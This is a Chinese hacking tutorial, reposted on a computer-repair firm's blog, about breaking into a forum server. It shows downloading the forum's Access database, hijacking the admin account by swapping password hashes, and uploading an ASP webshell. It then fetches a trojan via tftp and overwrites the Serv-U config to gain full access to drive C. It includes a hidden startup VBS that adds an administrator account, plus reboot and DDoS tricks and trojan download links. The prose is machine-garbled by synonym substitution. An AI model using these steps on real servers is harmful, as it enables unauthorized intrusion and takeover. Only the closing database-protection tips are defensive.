通过asp木马配合serv－u取得管理员权限

  编者：文章标题很简略．内容却比标题有趣多了，建议各位看看:)
  作者：ALLEN　QQ:515659
  本日心情不好，写一篇文章玩玩吧，利用网站的设置装备摆设错误配合serv－u取得办理员权限，简略一点就是通过asp木马配合serv－u取得办理员权限，哈哈哈，是不是很cool阿!
  －－－－－－－－－－－－文章开端－－－－－－－－－－－－
  为了找仓木麻衣的mp3（这个小姑娘的歌很难听阿），把半个互联网都搜完了（太浮夸了把)，就是找不到，苦然眼镜一亮，哈哈哈×××论坛，看来人气不错，也有mp3的下载地点，那就去看看吧
  晕～～～～，
  论坛错误信息
  孕育发生错误的可能缘故原由：
  您能否仔细阅读了帮助文件，可能您还没有登岸大概不具有使用以后功效的权限。
  还要注册阿，可是论坛由于种种缘故原由又不让注册
  气的我差点吐血！
  怎样办阿？？？唉，本想用溯雪破解几个密码。可是我们这个落伍的地方上彀贵，速度慢，有那个钱早就可以去买几张d版cd了，算了吧，想想别的办法把，打开我的xscan，任意扫了一下，服务器挺宁静阿，只开了21，80，3389端口
  看来做了端口过滤
  没什么可利用的毛病怎样办，不要着急，他用的是动网论坛，先试着下载他的数据库试试吧
  手动的找了一些，都不可
  我先猜一下数据库在哪个目次里面，如果猜对的话下载数据库的成功率就比较高了
  http://aaa.com/data
  http://aaa.com/database
  http://aaa.com/db
  HTTP 错误 404 - 找不到文件
  Internet 信息服务
  继续
  http://aaa.com/mdb
  HTTP 错误 403 - 禁止拜访
  Internet Explorer
  出现403错误就阐明对方有这个目次，但是不允许欣赏目次
  想想看mdb这个目次会是干什么的??哈哈十有八九十寄存数据库的目次！
  把我曩昔些的添加的数据库地点文件载入xscan（专门下载数据库的地点），然后只扫描cgi毛病
  scaning.......，大概10分钟已往了
  扫描结果
  /mdb/lovemaik.asa [毛病描述]
  哈哈哈，成功的扫到了数据库，顺便告诉大家一个技巧，
  把一些常用的数据库地点如data.mdb,database.asp等等添加到xscan的cgi数据库中，大概独自作一个数据库，你可以用一些字典来生成数据库地点，如许的成功率很高的！
  xscan有一个好处就是可以间接扫域名，比如http://www.seeie.com
  如许的话xscan就会帮你猜数据库地点
  http://www.seeie.com/mdb/data.asp
  http://www.seeie.com/mdb/db.mdb
  .......
  好了，如今打开Net Transport（一种很爽的下载工具）把数据库down过去，用了50多分钟，终于下载完了
  在本身的机器上安装jmail和动网论坛，把下载的数据库笼罩新数据库而且把数据库扩展名改为.mdb，接着注册用户：allen，密码：123456
  如今打开数据库，检察到我们刚才注册的用户allen的密码为49ba59abbe56e057(由于论坛使用md5不可逆算法加密，以是不克不及得到明文密码）
  好的把这一串数据复制一下，然后找到办理员的名字，也就是查找userclass表中数据为办理员的名字，把他的密码改成49ba59abbe56e057，记住在改密码之前肯定要把他的密码（经过MD5加密过的）复制到一个记事本里，好了，我们用办理员的名字登岸，密码就是123456，接着我们就去修改办理员的材料，把回答问题和答案改失！把email换成本身的，接着把刚才注册的用户allen提拔为办理员，退出，在用allen帐号登岸，把原来的办理员降成普通用户，可能有些人会问如许做是为什么，缘故原由是动网论坛不允许通过email取回办理员的密码，接着在打开数据库把原来办理员的密码给规复了，在打开论坛，忘记密码－回答问题－取回密码，哈哈哈，快打开你的信箱把，密码曾经发到你信箱了（注意，你的体系最好装jmail等邮件发送组件，要不然就会发不了邮件的）
  如今我们拿到了论坛办理员的密码了，
  注意：以上步调都是在当地操作的，其目的就是为了拿到论坛办理员密码！
  如今登岸那个论坛－进入办理页面－论坛版面办理 －任意选一个讨论区－在上传文件类型中加上.asp，呵呵
  好了，出来这个讨论区发表帖子－上传文件，呵呵，把asp木马传上去
  好了，可是这个文件被重定名了，唉，新亏手里另有一个免fso的木马，只有一个文件。传上去
  可惜这个木马不好用，还是本身的木马用着顺手，于是tftp -i AV女优.AV女优.AV女优.AV女优 GET use.asp
  好了，成功了，接这运转木马AV女优.com/bbs/use.asp?id=1
  呵呵，服务器的东西清清楚楚的摆在我们眼前了，上传一个winshell把
  靠，服务器有病毒防火墙，看看是nav的，算了，本身加个壳吧，如许可以逃过防火墙！
  继续，传上去并执行。。。。没反应！
  先telnet ip 8210（我喜欢用noika手机的型号做为端口，）
  --------------------------------------------------------------------------------
  靠，不可，差点忘了，对方做端口过滤了，怎样办阿，试试idq.dll（没报什么希望），果然对方的目次不可执行，在看一下对方有没有装perl，还是没有!在看看对方是什么分区款式，要是fat32那就好办了，试着删除c:\的任何文件都提示没有权限！阐明对方是ntfs分区，唉，麻烦阿！！！
  原来想就此打住的时候忽然发现了d:\Serv-U，于是我就想通过他来拿到权限
  注：在此之前最好在本身的机器上装一个Serv-U,
  我们先看看ServUStartUpLog.txt 这里面有Serv-U的版本信息！
  Sat 01Mar01 12:15:24 - Serv-U FTP Server v4.0 (4.1.0.0) - Copyright ? 1995-2002 Cat
  。。。。。。。。。。
  版本挺新阿，呵呵
  接着看看ServUDaemon.ini（用户设置装备摆设文件）
  哇考，里面的用户真多阿！
  接着我们把这个文件的内容复制一下，然后粘贴到当地serv－u的ServUDaemon.ini文件中，记住这时候最好停失你的serv－u，保存文件，接着打开ServUAdmin.exe，重新添加一个用户，记住这个用户最好是办理员权限，必需对目次和文件可以举行读写可执行等统统操作，接着把用户主目次设为c:\
  哈哈哈，到次为止大家都知道我的用意了把！
  把当地的ServUDaemon.ini的内容copy到对方服务器的ServUDaemon.ini中，然后保存！
  接这ftp上去
  哈哈c盘的东西全部暴露了，如今我们对c盘有读写权限，可以举行任何操作（注意：serv－u的办理员权限和nt的办理员权限不是一样的，serv－u的办理员只能设置装备摆设serv－u）
  由于对方做了端口过滤，办法不是很多，可以参考一篇修改注册表根改端口过滤的文章，是灰色轨迹论坛的一个网友写的，哈哈，在这里就不多说了！
  我们先写一个vbs脚本，把这个脚本重定名为Adobe Gamma Loader.vbs，如许办理员不容易发现！
  脚本内容：
  set wshshell=createobject ("wscript.shell" )
  a=wshshell.run ("cmd.exe /c net user allen AV女优** /add",0)
  b=wshshell.run ("cmd.exe /c net localgroup Administrators allen /add",0)
  大家都能看懂把，就是添加一个用户为allen密码为AV女优的具有办理员权限的帐号，哈哈！
  把这个脚本上传传到c:\Documents and Settings\All Users\「开端」菜单\程序\启动\
  呵呵为什么要vbs脚本呢？缘故原由很简略，就是不让办理员看见那个跳出来的黑黑的dos窗口。
  如今我们想办法让对方机器重启动！
  用asp木顿时传一个shutdown.exe
  然后执行shutdown.exe 127.0.0.1 /r
  哈哈，偶然候可能不会成功，是权限的缘故原由，详细。。。我也不太清楚。
  不外在nt or 2000上普通用户都可以重起机器
  另有一个办法就是在你的机器上新建一个筹划使命，内容就是定时重启动计算机，然后把他放到对方筹划使命的目次下，如果对方没有开筹划使命就不可了！
  如果还是成功不了你就用ddos把，哈哈，很暴力的让对方回绝服务，接这就会重启（有可能是办理员操作的）
  重启之后只需办理员登岸就可以添加一个帐号，哈哈
  到此为止我曾经拥有了办理员权限，呵呵
  （关于端口过滤）
  一般服务器至少会开21，80端口，像这种环境，即使有了办理员权限也没有多大用处！
  如果你可以得到一些bbs大概其他程序的办理员密码就比较好办了
  先传asp木马，然后用sc停失ftp服务，接着弄一些后门来占用21端口
  大概干脆暴力的占用！不外这些办法在ntfs的分区上成功率并不高！经过理论我发现一般可以暴力占用80端口，前提是对方web服务器为iis！如许在你没有完全拿到办理员权限之前，对方的网站可能会一直瘫痪，哈哈！
  （关于access数据库的宁静性）
  如今大部门网站都使用asp+access构建，如许的话通过下载access数据库简略就可以对网站举行粉碎！
  而很多的网站都不太器重这些，比如数据库文件名是data.mdb等
  而又有一部门人以为把数据库的扩展名改成.asp就万事大吉了,
  实在不然！大家可以做个试验 ，在本身的机器上把mdb改成asa大概asp 然后用任何一种下载工具下载，下载之后再把文件名改成.mdb
  文件照样可以用！道理很简略！iis只执行<% %>内的内容，而mdb文件单纯的修改扩展名只会让iis错误的以txt方式显示出来
  你可以看见，如果在欣赏器执行AV女优.asp(注意：这个是mdb数据库）就会看见一大堆乱码，和你用记事本打开看见的一样！
  防止数据库被下载的要领就有4种
  1：在数据库新建一个表，表名为<%safe就可以了 ，如许iis在剖析的时候会出现500错误，数据库也就下载不了了！
  2：在你的数据库文件名后门加上# （不是扩展名，比如name#.mdb）如许iis就以为你是在请求该目次中默许的文件名，比如index.asp，如果iis找不到就会收回403禁止欣赏目次的错误告诫！
  3：在iis中是把数据库地点的目次设为不可读，如许就可以防止被下载！请担心，如许做不会影响asp程序的正常使用！！
  4：间接使用数据源 (ODBC)如许数据库就可以不用在web目次里面，从而彻底防止被下载，但是如许做你必需拥有服务器的办理员权限，哈哈，大部门虚拟主机用户是不可能用数据源 (ODBC)的！
  --------------------------------------------------------------------------------
  本文涉及到的asp木马可以在以下地点下载：
  http://www.seeie.com/download/door/aspmm.rar （本人写的，必要在木马背面加上?id=1的参数，比如http://aaa/com/use.asp?id=1)
  http://www.seeie.com/download/door/nofso.rar (免fso的asp木马，很不错）
  Homepage:seeie.com
  Email:raul666@163.com
  －－－－－－－－－－－－－－－－－文章结束－－－－－－－-----------------------
 

文章作者: 福州军威计算机技术有限公司
军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
版权声明：原创作品，允许转载，转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

评论加载中... 内容： 评论者： 验证码：